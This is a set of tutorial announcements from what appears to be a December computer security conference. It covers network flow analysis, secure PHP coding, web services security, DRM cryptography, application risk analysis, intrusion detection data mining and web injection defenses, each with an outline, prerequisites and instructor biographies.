Tutorials

CANCELLED: Tutorial T4 – Acquisition and Analysis of Large Scale Network Data V.4

Dr. John McHugh, Dalhousie University

Tuesday, December 9th, Full Day

Detecting malicious activity in network traffic is greatly complicated by the large amounts of noise, junk, and other questionable traffic that can serve as cover for these activities. With the advent of low cost mass storage devices and inexpensive computer memory, it has become possible to collect and analyze large amounts of network data covering periods of weeks, months, or even years. This tutorial will present techniques for collecting and analyzing such data, both from network flow data that can be obtained from many routers and other flow connectors, derived from packet header data and from packet data such as that collected by TCPDump, etc., or constructed from application logs. This version of the course will consist of a half day of lecture that will introduce the core tools, followed by a half day of hands on analysis using a data set to be provided.

Because of the quantity of the data involved, we develop techniques, based on filtering of the recorded data stream, for identifying groups of source or destination addresses of interest and extracting the raw data associated with them. The address groups can be represented as sets or multisets (bags) and used to refine the analysis. For example, the set of addresses within a local network that appear as source addresses for outgoing traffic in a given time interval approximates the currently active population of the local network. These can be used to partition incoming traffic into that which might be legitimate and that which is probably not since it is not addressed to active systems. Further analysis of the questionable traffic develops smaller partitions that can be identified as scanners, DDoS backscatter, etc. based on flag combinations and packet statistics. Traffic to and from hosts whose sources appear in both partitions can be examined for evidence that its destinations in the active set have been compromised. The analysis can also be used to characterize normal traffic for a customer network and to serve as a basis for identifying anomalous traffic that may warrant further examination.

Outline

  1. Introduction
  2. Overview of the toolset and core tools
  3. Guided examples
  4. Directed Studies
  5. Outbrief

Prerequisites

General familiarity with IP network protocols. Elementary familiarity with simple statistical measures. The tutorial will consist of morning lectures followed by a guided "hands on" session in the afternoon.

We will have a limited number of workstations with the necessary tools and data installed, however, students are encouraged to bring their own laptops if possible as maximum benefit will be obtained by doing the exercises on an individual basis. The tools can be loaded from http://tools.netsa.cert.org/silk/ and will work on most varieties of Unix, including Linux, Mac OS X, Solaris, OpenBSD, etc. They should work on a VMware or similar Unix installation under Windows, but do not currently run as native Windows applications. Students registering for the course are encouraged to load, build, and test the tools prior to the tutorial. The data to be for the exercises will be available for download by mid November as well as on USB disks and DVDs at the tutorial. We anticipate using 5-10GB of data. Past experience shows that fast USB drives provide adequate performance in most cases if laptop disk space is a problem. The instructor will be available to help with any installation problems the evening before the tutorial and can be contacted by registered attendees for help prior to that time.

About the Instructor

Dr. John McHugh is the Canadian Research Chair in Privacy and Security at Dalhousie University in Halifax, NS. His research interests include network data analysis, visualization of network behaviors, and related aspects of computer security. He regularly teaches a semester course in the network data analysis and intrusion detection. He is one of the few external users and developers of the SiLK analysis suite for NetFlow analysis and has published extensively in the field. Prior to joining Dalhousie, he was a senior member of the technical staff with the CERT Situational Awareness Team, where he did research in survivability, network security, and intrusion detection. He was a professor and former chairman of the Computer Science Department at Portland State University in Portland, Oregon. His research interests include computer security, software engineering, and programming languages. He has previously taught at The University of North Carolina and at Duke University. He was the architect of the Gypsy code optimizer and the Gypsy Covert Channel Analysis tool. Dr. McHugh received his PhD degree in computer science from the University of Texas at Austin. He has a MS degree in computer science from the University of Maryland, and a BS degree in physics from Duke University.


Tutorial M2 – WebAppSec.php: Developing Secure Web Applications

Mr. Robert H'obbes' Zakon, Zakon Group LLC

Monday, December 8th, Full Day

Web applications are the new frontier of wide-spread security breaches. This tutorial will guide you through development practices to ensure the security and integrity of your application, in turn protecting user data and the infrastructure the application runs on. Several attack types will be reviewed, along with how the proper development practices can mitigate their damage. Although the tutorial targets the security of PHP-based applications, much of the content is applicable to other programming languages as well.

Outline

  1. Overview & Scope
  2. Secure Coding Practices (+)
  3. Attack Types & Prevention (+)
  4. Web 2.0, AJAX (+)
  5. Grand Finale

Prerequisites

A good understanding of web programming, preferably with some database programming experience. Familiarity with PHP, although not required, may be useful as examples covered will be PHP based.

About the Instructor

Mr. Robert Zakon is a technology consultant and developer who has been programming web applications since the Web's infancy, over 15 years ago. In addition to developing web applications for web sites receiving millions of daily hits, he works with organizations in an interim CTO capacity, and advises corporations, non-profits and government agencies on technology, information, and security architecture and infrastructure. Robert is a former Principal Engineer with MITRE's Information Security Center, CTO of an Internet consumer portal and application service provider, and Director of a university research lab. He is a Senior Member of the IEEE, and holds BS & MS degrees from Case Western Reserve University in Computer Engineering & Science with concentrations in Philosophy & Psychology. His interests are diverse and can be explored at www.Zakon.org.


Tutorial T5 – Web Services Security, Techniques and Challenges

Dr. Anoop Singhal, NIST
Mr. Gunnar Peterson, Arctec Group

Tuesday, December 9th, Full Day

The advance of Web services technologies promises to have far-reaching effects on the Internet and enterprise networks. Web services based on the eXtensible Markup Language (XML), Simple Object Access Protocol (SOAP), and related open standards, and deployed in Service Oriented Architectures (SOA) allow data and applications to interact without human intervention through dynamic and ad hoc connections. Web services technology can be implemented in a wide variety of architectures, can co-exist with other technologies and software design approaches, and can be adopted in an evolutionary manner without requiring major transformations to legacy applications and databases.

The security challenges presented by the Web services approach are formidable and unavoidable. Many of the features that make Web services attractive, including greater accessibility of data, dynamic application-to-application connections, and relative autonomy (lack of human intervention) are at odds with traditional security models and controls. Simply put – when you empower developers, you empower attackers. Difficult issues and unsolved problems exist, such as the following:

  1. Confidentiality and integrity of data transmitted via Web services protocols in service-to-service transactions, including data that transits intermediary (pass-through) services.
  2. Functional integrity of the Web services themselves, requiring both establishment in advance of the trustworthiness of services to be included in service orchestrations or choreographies, and the establishment of trust between services on a per transaction basis.
  3. Availability in the face of denial of service attacks that exploit vulnerabilities unique to Web service technologies, especially targeting core services, such as discovery service, on which other services rely.

Perimeter-based network security technologies (e.g., firewalls, intrusion detection) are inadequate to protect SOAs due to the following reasons:

  • SOAs are dynamic, and can seldom be fully constrained to the physical boundaries of a single network
  • SOAP protocol is transmitted over HTTP, which is allowed to flow without restriction through most firewalls. Moreover, TLS, which is used to authenticate and encrypt Web-based transactions, is not a silver bullet for protecting SOAP messages because it is designed to operate between two endpoints. TLS cannot accommodate Web services' inherent ability to forward messages to multiple other Web services simultaneously.

The SOA processing model requires the ability to secure SOAP messages and XML documents as they are forwarded along potentially long and complex chains of consumer, provider, and intermediary services. The nature of Web services processing makes those services subject to unique attacks, as well as variations on familiar attacks targeting Web servers.

Ensuring the security of Web services involves implementation of new security models based on use of authentication, authorization, confidentiality, and integrity mechanisms. This tutorial will discuss how to implement those security mechanisms in Web services. It also discusses how to make Web services and portal applications robust against the attacks to which they are subject. The following is a summary of some of the topics that will be discussed

  1. WS-Security
  2. XML Security using XML Encryption and XML Signatures
  3. Threats facing Web Services
  4. Policy and Access control using WS-Policy, XACML and SAML
  5. Security Management using WS-Trust
  6. PKI for Web Services using XKMS
  7. Secure Implementation Tools and Techniques
  8. Recommendations for Web Services Security

Prerequisites

Participants should be familiar with concepts of network security and Web applications

About the Instructors

Dr. Anoop Singhal is currently a Computer Scientist in the Computer Security Division at NIST. He has several years of Research experience at George Mason University, AT&T Labs and Bell Labs. As a Distinguished Member of Technical Staff at Bell Labs he has led several software projects in the area of Databases, Web Services and Network Management. He is a senior member of IEEE and he has published more than 20 papers in leading conferences and journals. He received his Ph.D. in Computer Science from Ohio State University, Columbus Ohio in 1985. He has given talks on Web Services Security in conferences such as ACSAC 2006 and RSA 2007.

Gunnar Peterson is a Managing Principal at Arctec Group. He is focused on distributed systems security for large mission critical financial, financial exchanges, healthcare, manufacturer, and insurance systems, as well as emerging start ups Mr. Peterson is an internationally recognized software security expert, frequently published, an Associate Editor for IEEE Security & Privacy Journal on Building Security In, an Associate Editor for Information Security Bulletin, a contributor to the SEI and DHS Build Security In portal on software security, and an in-demand speaker at security conferences. He maintains the 1 Raindrop blog with loosely coupled thoughts on software, security and the systems that run on them at http://1raindrop.typepad.com


Tutorial M3 – Cryptographic Techniques for Digital Rights Management

Dr. Hongxia Jin, IBM Almaden Research Center
Mr. Jeffery Lotspiech, Lotspiech.com LLC

Monday, December 8th, Full Day

Today we live in a digital world. The advent of digital technologies has made the creation and manipulation of multimedia content simpler. It offers higher quality and a lot more convenience to consumers. For example, it allows one to make perfect copies. Furthermore, the rapid advance of network technologies, cheaper storage and larger bandwidth have enabled new business models on electronically distributing and delivering multimedia content. However, unauthorized music and movie copying are eating a big bite of the profit of the record industry, and beginning to impact the movie studios. The success of these emerging business models hinges on the ability to only deliver the content to authorized customers. It is highly desirable to develop techniques to protect the copyrighted material and defend against piracy.

Many digital rights management (DRM) systems have been developed. However, most DRM systems are overly restrictive on user's behavior. For example, users are not allowed to make any copies on their purchased content. It is not surprising that DRM receives bad press. A more balanced DRM system can be much more user friendly. We believe cryptographic techniques can be used to enable such a balanced system.

There are many cryptographic technologies that have developed for Digital Rights Management. We cover from basic key management and forensic techniques; renewability; content certificates; managed copies; driver authentication; proactive renewal. Since the authors are the actual inventors of some of these core technologies that are currently used in various industry standards, the authors will use their first hand experience on design, implementation and deployment of DRM solutions for content protection to teach security researchers and practitioners how to design various cryptographic techniques that can be used in building a balanced DRM system. For example, the "managed copies" technology enables the users to import a purchased movie disc into their home entertainment network.

Even though some of the technologies have received extensive studies in the cryptography literature, bringing them to practice is a different question. There are many issues that the theoretical community has overlooked in order to bring the solution to practice. This tutorial will cover both state-of-the-art and state-of-the-practice. It will also cover the gap between state-of-art and practice and show the authors' experience on how to bring a theoretical solution to practice.

The tutorial will also cover some attacks that have actually occurred in practice. For example, in a pirate decoder attack, the attackers break legitimate players, extract secret keys out of the players and build a clone player that can use to rip the content. In an anonymous attack, the attackers can set up a server and serve the clients with the per-content keys on demand, or simply pirate and re-distribute the decrypted plain content. Practical forensic technologies that can detect the attackers in these types of attacks will be discussed in depth in the tutorial.
Since the authors have been involved in various content protection standards for many years, in this tutorial they will also show how to market the technologies to the various stakeholders: the television and film industry, the consumer electronic industry, and the information technology industry, with their quite different concerns. They will talk about the value of open standard-based licensing infrastructure in commercializing DRM technologies in a market, and some of the constraints and assurances that the various industries demand in these licenses. They will also discuss copyright law, not to give legal opinions, but to point out the curious situation where both the DRM practitioners and the DRM attackers cite copyright law to justify their actions.

Outline

  1. Introduction
  2. Key Management Approaches
  3. Broadcast Encryption
  4. Managed copies
  5. Key Conversion data
  6. Content Certificates
  7. Attacks (real and potential)
  8. Forensic Technologies
  9. Online features
  10. Managed copies
  11. Copy control water marking
  12. Drive authentication
  13. Future of DRM research directions

Prerequisites

This tutorial is targeted at a beginner to intermediate audience; only basic background on cryptography is assumed. No textbook is required. The attendees will walk away with an understanding of the various cryptographic technologies that can be used for building a customer friendly DRM system. We will talk about different types of real and potential pirate attacks and challenges associated with defending against each attack. Intermediate students will have the opportunity to get summary of existing cryptographic techniques. Academic researchers will walk away with an understanding of challenges arising to bring theoretical solutions to practice as well as potential new research directions that have been largely overlooked from academia in this area. Industrial practitioners will walk away with an understanding of real world DRM systems, from design, legal issues, to adoption.

About the Instructors

The authors are the actual inventors of some of the technologies deployed in multiple industry content protection standards. They bring expertise in mainstream content protection technologies and first-hand design, implementation and deployment of key generation, management and forensic systems in real world.

Dr. Hongxia Jin obtained her Ph.D. degree in computer science from the Johns Hopkins University in 1999 and worked as a Research Staff Member for IBM research ever since. She is currently at the IBM Almaden Research Center, where she is the leading researcher working on key management, broadcast encryption and traitor tracing technologies. The key management and forensic technologies she invented have been chosen as the core technologies by AACS, a new content protection industry standards for managing content stored on the next generation of pre-recorded and recorded optical media for consumer use with PCs and consumer electronic devices. She has filed about 20 patents in this area and has been awarded IBM's Outstanding Innovation Achievement Award. She also published numerous papers as well as invited book chapters and journal papers. She has been an invited speaker at multiple forums and universities including Stanford, CMU and University of California at Berkeley.

Mr. Jeffrey Lotspiech was in at the inception of technologies for both the 4C and the AACS industry standards. He is a named inventor on over 100 patents, including most of the key patents that protect content on physical media. He was the founder and first manager of the content protection group at the IBM Almaden Research Center. He retired from IBM in 2005, and now owns a content protection consulting company. He received his MS and BS in EE (Computer Science) from the Massachusetts Institute of Technology in 1972.


Tutorial T7 – Multi-perspective Application Security Risk Analysis: A Toolbox Approach

Mr. Sean Barnum, Cigital, Inc (Coordinator)

Jacob West, Fortify Software
Ray Lintner, IBM/Rational/Watchfire
Anthony Vicinelly, Application Security Inc.
Maj Michael Kleffman, USAF

Tuesday, December 9th, Half Day

NOTE: This session is tightly focused on concept and execution of the approach discussed here rather than specific products or services and will avoid marketing language from any of the participants. Examples may be leveraged using individual tools but the focus will be on the example content and not on selling the tool.

Today, most people no longer need to be convinced of the criticality of application software security. The focus has moved from simple awareness to identification and deployment of effective methods and tools to assess and mitigate application software security risk. Much has been said recently about the limitations of individual tools and the importance of a toolbox approach. Unfortunately, this discussion has been almost exclusively regarding the use of multiple tools within one individual perspective, such as static code analysis. This tutorial introduces the importance of a true toolbox approach where sets of tools supporting differing perspectives of analysis are used together in an integrated fashion to yield a more comprehensive and actionable assessment of application security risk. Specifically, this tutorial will discuss a recommended baseline for multi-perspective analysis leveraging static source code analysis, application scanning & penetration testing and application data security analysis tools along with a real-world case study where this baseline is being leveraged today.

This session offers attendees an opportunity to learn about a best-practice approach to application security risk analysis from a unified team of the industry's leading practitioners in software security professional services (Cigital), static source code analysis (Fortify Software), web application scanning and penetration testing (IBM/Rational/Watchfire) and application data security analysis (Application Security, Inc.). In addition, they will hear from a representative of the USAF Application Software Assurance Center of Excellence (ASACoE) regarding the current use of this approach to assess Air Force software applications.

What will attendees gain from this session?

  • An understanding of the various potential perspectives of application security risk analysis
  • An understanding and appreciation of the value of integrated multi-perspective application security risk analysis
  • An understanding of the challenges and mechanisms for integrating multiple perspectives of application security risk analysis
  • An understanding of an actionable baseline approach for pursuing multi-perspective application security risk analysis
  • A confidence that multi-perspective application security risk analysis is real, practical and something that they should consider today

Outline

  1. Overview of Multi-perspective Application Security Risk Analysis: Cigital
  2. Role of static code analysis as an element of integrated multi-perspective risk analysis: Fortify Software
  3. Role of application scanning and penetration testing as an element of integrated multi-perspective risk analysis: IBM/Rational/Watchfire
  4. Role of application data security analysis as an element of integrated multi-perspective risk analysis: Application Security Inc.
  5. Real-world case study - Air Force Application Software Assurance Center of Excellence (ASACoE) Triage Risk Assessments: AF ASACoE
  6. Integrated example: Cigital
  7. Summary and Conclusion: Cigital

Prerequisites

Knowledge of software development technologies and processes; Familiarity with software risk analysis (including one or more of static code analysis, application scanning & penetration testing or application data security analysis) would be useful

About the Instructors

Mr. Sean Barnum is a Principal Consultant at Cigital and is technical lead for their federal services practice. He has over 23 years of experience in the software industry in the areas of development, software quality assurance, quality management, process architecture & improvement, knowledge management and security. He is a frequent contributor, speaker and trainer for regional and national software security and software quality publications, conferences & events. He is very active in the software assurance community and is involved in numerous knowledge standards-defining efforts including the Common Weakness Enumeration (CWE), the Common Attack Pattern Enumeration and Classification (CAPEC), and other elements of the Software Assurance Programs of the Department of Homeland Security and the Department of Defense. He is coauthor of the book "Software Security Engineering: A Guide for Project Managers", recently published by Addison-Wesley. He is also the lead technical subject matter expert for the Air Force Application Software Assurance Center of Excellence.

Mr. Jacob West manages Fortify Software's Security Research Group, which is responsible for building security knowledge into Fortify's products. Jacob brings expertise in numerous programming languages, frameworks and styles together with knowledge about how real-world systems can fail. In addition, he recently co-authored a book, "Secure Programming with Static Analysis," which was published in June 2007. Before joining Fortify, Jacob worked with Professor David Wagner, at the University of California at Berkeley, to develop MOPS (MOdel Checking Programs for Security properties), a static analysis tool used to discover security vulnerabilities in C programs. When he is away from the keyboard, Jacob spends time speaking at conferences and working with customers to advance their understanding of software security.

Mr. Ray Lintner is a senior technical resource for IBM/Rational/Watchfire in the field of application scanning and penetration testing.

Mr. Anthony Vicinelly is the Federal Systems Engineer for Application Security Inc, with responsibility for assisting with product evaluation, implementation, and integration of DbProtect, the company's industry-leading database security suite. He is also the technical resource for customers within the federal government and helping them achieve their individual database compliance and security goals. He brings with him experience as a Software Engineer for Raytheon Company, where he was responsible for the development, deployment, integration, and training of database and web-based applications. Mr. Vicinelly holds a B.S in Computer Science from Westminster College.

Maj. Michael D. Kleffman is the Chief Technical Officer (CTO) for the Application Software Assurance Center of Excellence (ASACoE), 754ELSG at Maxwell AFB-Gunter Annex, AL. As CTO, he integrates software assurance tools and processes into A.F. software development and new acquisitions. Maj. Kleffman has also managed the Air Force Incident Response Team who handled an average of 100 network intrusions per year. In addition, Capt Kleffman led a team of 20 analysts who monitored over 1000 real-time incidents per day. Maj. Kleffman has a BS from McMurry University and an MS in Information Assurance from the Air Force Institute of Technology.


Tutorial M1 – Intrusion Detection and Assessment through Mining and Learning Data Characteristics of Cyber Attacks and Normal Use Activities

Dr. Nong Ye, Arizona State University

Monday, December 8th, Full Day

Intrusion detection and assessment through signature recognition, anomaly detection, attack-norm separation, and event correlation all require the learning of data characteristics of cyber attacks and normal use activities to enable the detection and correlation of cyber attack events. Data mining techniques are desirable to handle large amounts of computer and network data that are collected under attack and normal use conditions of computers and networks to learn data characteristics of cyber attacks and normal use activities.

This tutorial will cover the conventional and new applications of data mining and analysis techniques to mining and learning data characteristics of cyber attacks and normal use activities in mean shift, density distribution change, autocorrelation change, wavelet signal change, and classification models. These data characteristics have shown to be useful in detecting many cyber attacks. Examples of such data characteristics associated with a variety of cyber attacks, such as Rootkits, hardware and software keyloggers, buffer overflow, denial of service, ARP poison, and vulnerability scan, will be illustrated. This tutorial will also demonstrate how such attack and normal use data characteristics can be used to support the two conventional approaches of intrusion detection and assessment (signature recognition and anomaly detection) and a new approach, called attack-norm separation. All of the covered data mining techniques allow the incremental learning and update of attack and normal use data characteristics when new computer and network data are collected under new attack and normal use conditions.

Outline

  1. Overview of intrusion detection and assessment approaches and their requirements for data characteristics of cyber attacks and normal use activities
  2. Computer and network data collected under attack and normal use conditions
  3. Density distribution and parameter estimation to discover the mean shift and distribution change characteristics
  4. Autocorrelation and time series analysis to discover the autocorrelation change characteristic
  5. Wavelet analysis to discover the data characteristic in time-frequency domain
  6. Classification models to discover target data patterns
  7. Use of data characteristics to support signature recognition, anomaly detection and attack-norm separation
  8. Mining and learning data characteristics for other applications

Prerequisites

General knowledge of cyber attacks, intrusion detection systems, as well as computer and network security

About the Instructor

Dr. Nong Ye is a full professor at Arizona State University (ASU). She received her Ph.D. degree in Industrial Engineering from Purdue University, and her M.S. and B.S. degrees in Computer Science. Dr. Ye taught numerous courses on cyber security and data mining at ASU, and has extensive research experience in intrusion detection and data mining. She has published 132 journal and conference papers as well as three books. Dr. Ye holds a patent for a method and algorithm for classifying data for intrusion detection and other data mining applications, and is the recipient of $9.2M in external research grants, awards and contracts. More information is available at enpub.fulton.asu.edu/ye.


Tutorial T6 – Web Injection Attacks

Dr. V. N. Venkatakrishnan, University of Illinois at Chicago

Tuesday, December 9th, Half Day

In September 2007, MITRE Corp., a corporation that runs three federally funded research and development centers, reported that Cross-Site Scripting and SQL Injection Attacks (SQLIA) were the two most common forms of web injection attacks in 2006. MITRE Corp. came to this conclusion after studying a list of more than 20,000 common vulnerability and exposures (CVE) for that year. This tutorial will focus on Web injection attacks and defenses. We will focus on Cross Site Scripting (XSS) attacks and SQL injection attacks, while briefly discussing other forms of injection attacks.

Our discussion of web injection attack defense will include both vulnerability identification approaches and m attack prevention approaches. The former category consists of techniques that identify vulnerable locations in a web application that may lead to injection attacks. The latter category includes prevention mechanisms around a (possibly vulnerable) deployed application to prevent attacks. Some of the actual techniques covered will include static and dynamic analysis for vulnerability identification and taint-based runtime defenses for attack prevention.

This tutorial is designed as an introductory survey of research on web injection attacks. It is targeted towards researchers, students, and practitioners wishing to develop solutions that build on the current state-of-art research in this area.

Outline

  1. Introduction
  2. Vulnerability identification mechanisms
  3. Attack Detection Mechanisms
  4. More advanced attacks
  5. Q & A

Prerequisites

Some basic introduction in computer security is required.

About the Instructor

Dr. V. N. Venkatakrishnan is an Assistant Professor of Computer Science at the University of Illinois at Chicago. He is currently co-director of the Center for Research and Instruction in Technologies for Electronic Security (RITES) at UIC. His main research interests are in web security, mobile code security, techniques for enforcing confidentiality and integrity policies in applications. He received his Ph.D degree from Stony Brook University in 2004. He has won numerous awards including the best paper award at ACSAC 2003.